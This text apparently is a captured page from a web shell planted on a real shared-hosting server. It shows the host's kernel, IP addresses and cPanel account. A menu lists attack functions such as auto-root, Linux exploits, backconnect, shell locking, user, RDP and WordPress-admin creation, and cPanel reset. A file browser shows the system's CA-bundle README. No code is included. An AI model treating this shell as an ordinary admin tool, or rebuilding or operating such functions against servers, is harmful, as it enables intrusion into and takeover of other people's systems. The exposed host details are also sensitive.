Linux cpanel07wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.80.el6.x86_64 #1 SMP Thu Sep 24 01:42:00 EDT 2020 x86_64
Apache
: 163.44.198.52 | : 216.73.216.237
Cant Read [ /etc/named.conf ]
8.0.9
cp657342
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
pki /
ca-trust /
extracted /
pem /
[ HOME SHELL ]
Name
Size
Permission
Action
README
897
B
-rw-r--r--
email-ca-bundle.pem
165.75
KB
-r--r--r--
objsign-ca-bundle.pem
122.42
KB
-r--r--r--
tls-ca-bundle.pem
219.3
KB
-r--r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README
This directory /etc/pki/ca-trust/extracted/pem/ contains CA certificate bundle files which are automatically created based on the information found in the /usr/share/pki/ca-trust-source/ and /etc/pki/ca-trust/source/ directories. All files are in the BEGIN/END CERTIFICATE file format, as decribed in the x509(1) manual page. Distrust information cannot be represented in this file format, and distrusted certificates are missing from these files. If your application isn't able to load the PKCS#11 module p11-kit-trust.so, then you can use these files in your application to load a list of global root CA certificates. Please never manually edit the files stored in this directory, because your changes will be lost and the files automatically overwritten, each time the update-ca-trust command gets executed. Please refer to the update-ca-trust(8) manual page for additional information.
Close